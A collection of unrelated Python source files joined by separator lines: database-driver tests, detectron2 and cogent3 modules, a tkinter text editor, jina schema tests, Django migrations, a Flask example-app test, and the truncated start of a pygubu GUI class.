names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
# Real test for setoutputsize is driver dependent
raise NotImplementedError('Driver needed to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary(str2bytes('Something'))
b = self.driver.Binary(str2bytes(''))
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .box_head import ROI_BOX_HEAD_REGISTRY, build_box_head
from .keypoint_head import ROI_KEYPOINT_HEAD_REGISTRY, build_keypoint_head, BaseKeypointRCNNHead
from .mask_head import ROI_MASK_HEAD_REGISTRY, build_mask_head, BaseMaskRCNNHead
from .roi_heads import (
ROI_HEADS_REGISTRY,
ROIHeads,
Res5ROIHeads,
StandardROIHeads,
build_roi_heads,
select_foreground_proposals,
)
from .rotated_fast_rcnn import RROIHeads
from .fast_rcnn import FastRCNNOutputLayers
from . import cascade_rcnn # isort:skip
__all__ = list(globals().keys())
|
import os.path
import tkinter as tk
import tkinter.filedialog as fd
import tkinter.messagebox as mb
def main():
text_editor = TextEditor()
text_editor.mainloop()
class TextEditor(tk.Tk):
def __init__(self):
super(TextEditor, self).__init__()
self.title('Ugly Text Editor')
self.option_add('*Dialog.msg.font', 'Arial 12')
self.minsize(640, 360)
self.maxsize(self.winfo_screenwidth(), self.winfo_screenheight())
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(fill='y', side='right')
self.text_field = tk.Text(self, bd=0, highlightthickness=0, yscrollcommand=self.scrollbar.set)
self.text_field.pack(fill='both', expand=True)
self.scrollbar.config(command=self.text_field.yview)
self.menu_bar = tk.Menu(self)
self.file_menu = tk.Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label='New', accelerator='Ctrl+N', command=self.new_file)
self.file_menu.add_command(label='Open...', accelerator='Ctrl+O', command=self.open_file)
self.file_menu.add_separator()
self.file_menu.add_command(label='Save', accelerator='Ctrl+S', command=self.save_file)
self.file_menu.add_command(label='Save as...', accelerator='Ctrl+Shift+S', command=self.save_file_as)
self.file_menu.add_separator()
self.file_menu.add_command(label='Quit', accelerator='Ctrl+Q', command=self.quit)
self.menu_bar.add_cascade(label='File', menu=self.file_menu)
self.menu_bar.add_command(label='About', command=TextEditor.show_about)
self.config(menu=self.menu_bar)
self.bind('<Control-n>', lambda e: self.new_file())
self.bind('<Control-N>', lambda e: self.new_file())
self.bind('<Control-o>', lambda e: self.open_file())
self.bind('<Control-O>', lambda e: self.open_file())
self.bind('<Control-s>', lambda e: self.save_file())
self.bind('<Control-S>', lambda e: self.save_file())
self.bind('<Control-Shift-s>', lambda e: self.save_file_as())
self.bind('<Control-Shift-S>', lambda e: self.save_file_as())
self.bind('<Control-q>', lambda e: self.quit())
self.bind('<Control-Q>', lambda e: self.quit())
self.filename = None
def new_file(self):
self.filename = None
self.text_field.delete('1.0', 'end')
def open_file(self):
self.filename = fd.askopenfilename()
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'r') as f:
self.text_field.delete('1.0', 'end')
self.text_field.insert('end', f.read())
def save_file(self):
if self.filename and os.path.isfile(self.filename):
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
else:
self.save_file_as()
def save_file_as(self):
self.filename = fd.asksaveasfilename()
if self.filename:
with open(self.filename, 'w') as f:
f.write(self.text_field.get('1.0', 'end'))
@staticmethod
def show_about():
mb.showinfo(
'About',
'Ugly Text Editor v1.0\nDeveloped by Kirill Volozhanin\ngithub.com/JustKappaMan',
)
if __name__ == '__main__':
main()
|
import pydantic
import pytest
from jina.peapods.runtimes.gateway.http.models import (
PROTO_TO_PYDANTIC_MODELS,
JinaRequestModel,
)
from jina.types.document import Document
from tests import random_docs
def test_schema_invocation():
for v in vars(PROTO_TO_PYDANTIC_MODELS).values():
v.schema()
v.schema_json()
def test_existing_definitions():
"""This tests: all internal schema definitions are part of parent"""
for i in [
'QuantizationMode',
'DenseNdArrayProto',
'SparseNdArrayProto',
'NdArrayProto',
'NamedScoreProto',
'DocumentProto',
]:
assert (
i in PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'].keys()
)
def test_enum_definitions():
"""This tests: all enums are defined properly as different levels"""
quantization_enum_definition = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['QuantizationMode']
assert quantization_enum_definition['enum'] == [0, 1, 2, 3]
status_code_enum_definition = PROTO_TO_PYDANTIC_MODELS.StatusProto().schema()[
'definitions'
]['StatusCode']
assert status_code_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
command_enum_definition = PROTO_TO_PYDANTIC_MODELS.RequestProto().schema()[
'definitions'
]['Command']
assert command_enum_definition['enum'] == [0, 1, 2, 3, 4, 5, 6]
def test_all_fields_in_document_proto():
"""This tests: all fields are picked from the proto definition"""
document_proto_properties = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema(
by_alias=False
)['definitions']['DocumentProto']['properties']
for i in [
'id',
'granularity',
'adjacency',
'parent_id',
'chunks',
'weight',
'matches',
'mime_type',
'uri',
'tags',
'location',
'offset',
'embedding',
'scores',
'modality',
'evaluations',
]:
assert i in document_proto_properties
document_proto_properties_alias = PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()[
'definitions'
]['DocumentProto']['properties']
for i in ['parentId', 'mimeType']:
assert i in document_proto_properties_alias
def test_oneof_text():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc')
assert doc.text == 'abc'
assert 'blob' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_buffer():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(buffer=b'abc')
assert doc.buffer == b'abc'
assert 'text' not in doc.dict()
assert 'blob' not in doc.dict()
def test_oneof_blob():
"""This tests: oneof field is correctly represented as `anyOf`"""
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert doc.blob == PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
assert 'text' not in doc.dict()
assert 'buffer' not in doc.dict()
def test_oneof_validation_error():
"""This tests validation error for invalid fields"""
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(text='abc', buffer=b'abc')
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
with pytest.raises(pydantic.error_wrappers.ValidationError) as error:
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
text='abc', buffer=b'abc', blob=PROTO_TO_PYDANTIC_MODELS.NdArrayProto()
)
assert "only one field among ['buffer', 'blob', 'text', 'graph']" in str(
error.value
)
def test_tags_document():
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world')
assert doc.tags == {'hello': 'world'}
assert Document(doc.dict()).tags == {'hello': 'world'}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': 'value'})
assert doc.tags == {'hello': 'world', 'key': 'value'}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': 'value',
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(
hello='world', tags={'key': {'nested': 'value'}}
)
assert doc.tags == {'hello': 'world', 'key': {'nested': 'value'}}
assert Document(doc.dict()).tags == {
'hello': 'world',
'key': {'nested': 'value'},
}
doc = PROTO_TO_PYDANTIC_MODELS.DocumentProto(hello='world', tags={'key': [1, 2, 3]})
# TODO: Issue about having proper ListValueView, not really expected
assert doc.tags != {'key': [1, 2, 3]}
with pytest.raises(TypeError):
assert Document(doc.dict()).tags != {{'key': [1, 2, 3]}}
def test_repeated():
"""This tests: repeated fields are represented as `array`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
"""This tests: recursive schmea definions are represented properly"""
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
"""This tests: google.protobuf.Struct are represented as `object`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
"""This tests: google.protobuf.Timestamp are represented as date-time"""
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
|
#!/usr/bin/env python
"""
This file defines a class for controlling the scope and heterogeneity of
parameters involved in a maximum-likelihood based tree analysis.
"""
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
# first cut at saving pc's
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
"""A ParameterController works by setting parameter rules. For each
parameter in the model the edges of the tree are be partitioned into groups
that share one value.
For usage see the set_param_rule method.
"""
# Basically wrapper around the more generic recalulation.ParameterController
# class, which doesn't know about trees.
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
# cache of arguments used to construct
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
"""Lengths are set to the values found in the tree (if any), and
free to be optimised independently.
Other parameters are scoped based on the unique values found in the
tree (if any) or default to having one value shared across the whole
tree"""
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
continue # new parameter
for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
# hopefully due to being a discrete model
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False # should be done per-locus
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
"""From information specifying the scope of a parameter derive a list of
edge names"""
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
edges = None # meaning all edges
elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
"""batch applies a collection of param rules"""
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
"""modifes the scope of all submodel rate, aside from excluded params,
by constructing a list of parameter rules and using the
apply_param_rules method
Parameters
----------
exclude_params
name(s) of substitution model predicate(s) to be excluded
edge_sets
series of dicts with an 'edges' key. Can also specify
is_independent, is_contstant etc.. If those are not provided, the
method argument values are applied
is_independent : bool
whether edges in all edge sets are to be considered independent.
default is False
Overridden by edge_sets values.
is_constant : bool
makes constant all rate term parameters for all edge sets.
Overridden by edge_sets values.
value
value for constant parameters, only valid when is_constant.
Overridden by edge_sets values.
lower, init, upper
lower bound, starting value, upper bound for all parameters for
all edge sets. Only valid if not is_constant.
Overridden by edge_sets values.
"""
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
# this just makes the following algorithm consistent
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
# we make param rules
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
"""Define a model constraint for par_name. Parameters can be set
constant or split according to tree/bin scopes.
Parameters
----------
par_name
The model parameter being modified.
is_constant, value
if True, the parameter is held constant at
value, if provided, or the likelihood functions current value.
is_independent
whether the partition specified by scope/bin
arguments are to be considered independent.
lower, init, upper
specify the lower bound, initial value and
upper bound for optimisation. Can be set separately.
bin, bins
the name(s) of the bin to apply rule.
locus, loci
the name of the locus/loci to apply rule.
**scope_info
tree scope arguments
- edge, edges: The name of the tree edge(s) affected by rule.
- tip_names: a tuple of two tip names, specifying a tree scope
to apply rule.
- outgroup_name: A tip name that, provided along with tip_names,
ensures a consistently specified tree scope.
- clade: The rule applies to all edges descending from the most
recent common ancestor defined by the tip_names+outgroup_name
arguments.
- stem: The rule applies to the edge preceding the most recent
common ancestor defined by the tip_names+outgroup_name
arguments.
"""
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
def set_local_clock(self, tip1name, tip2name):
"""Constrain branch lengths for tip1name and tip2name to be equal.
This is a molecular clock condition. Currently only valid for tips
connected to the same node.
Note: This is just a convenient interface to setParameterRule.
"""
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
"""Constrains edge lengths to those in the tree.
Parameters
----------
tree
must have the same topology as the current model.
If not provided, the current tree length's are used.
exclude_list
a list of edge names whose branch lengths
will be constrained.
"""
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
"""returns Aikake Information Criteria
Parameters
----------
second_order
if true, the second
adjusted by the alignment length
"""
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
def get_bic(self):
"""returns the Bayesian Information Criteria"""
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
"""set the alignment to be used for computing the likelihood."""
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
# if has uniq, probably already a likelihood tree leaf obj already
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
|
# Generated by Django 3.2.4 on 2021-07-05 08:34
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# cds-migrator-kit is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test example app."""
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
"""Example app fixture."""
current_dir = os.getcwd()
# Go to example directory
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
# Setup application
assert subprocess.call('./app-setup.sh', shell=True) == 0
# Start example app
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
# Stop server
os.killpg(webapp.pid, signal.SIGTERM)
# Return to the original directory
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
"""Test example app."""
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-03-20 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
# In pixelWidth/height per pixel. scaleSize = 25 means that every pixel will show as a 25x25 square
